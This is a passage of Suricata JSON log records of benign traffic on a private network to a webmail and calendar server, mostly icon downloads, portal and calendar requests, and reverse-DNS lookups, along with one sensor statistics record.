Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624}} {"timestamp":"2020-02-29T00:11:34.000232+0000","event_type":"stats","stats":{"uptime":14346,"capture":{"kernel_packets":134652,"kernel_drops":0},"decoder":{"pkts":134664,"bytes":92900687,"invalid":185,"ipv4":133179,"ipv6":8,"ethernet":134664,"raw":0,"null":0,"sll":0,"tcp":127939,"udp":5040,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2746,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2762,"synack":2753,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1787,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2301,"failed_udp":111},"tx":{"http":4597,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2380}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2351,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74685,"memcap":0}}} {"timestamp":"2020-02-29T00:11:34.034672+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46822,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:34.295285+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982}} {"timestamp":"2020-02-29T00:11:35.996627+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:11:35.996750+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:11:35.999895+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":0}} {"timestamp":"2020-02-29T00:11:35.999800+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:11:36.001784+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213}} {"timestamp":"2020-02-29T00:11:36.003246+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","state":"CLOSED","stored":false,"size":213,"tx_id":1}} {"timestamp":"2020-02-29T00:11:36.013992+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:11:36.023877+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7550,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:36.041297+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:11:36.054763+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.257907+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4763,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.259305+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:11:36.259648+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:11:36.260038+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:36.261237+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.263342+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:11:36.305361+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:11:36.305392+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:11:37.000761+0000","flow_id":826869973231761,"event_type":"flow","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":255,"bytes_toclient":141,"start":"2020-02-29T00:06:31.436369+0000","end":"2020-02-29T00:06:36.553564+0000","age":5,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:37.019053+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34796,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31912,"tx_id":0}} {"timestamp":"2020-02-29T00:11:38.244392+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36850,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:38.920615+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:11:39.182692+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.193045+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19489,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.300002+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34798,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37765,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.380794+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.390757+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39025,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.525557+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5490,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.535760+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":3}} {"timestamp":"2020-02-29T00:11:39.536000+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:11:39.535374+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":5}} {"timestamp":"2020-02-29T00:11:39.535761+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} 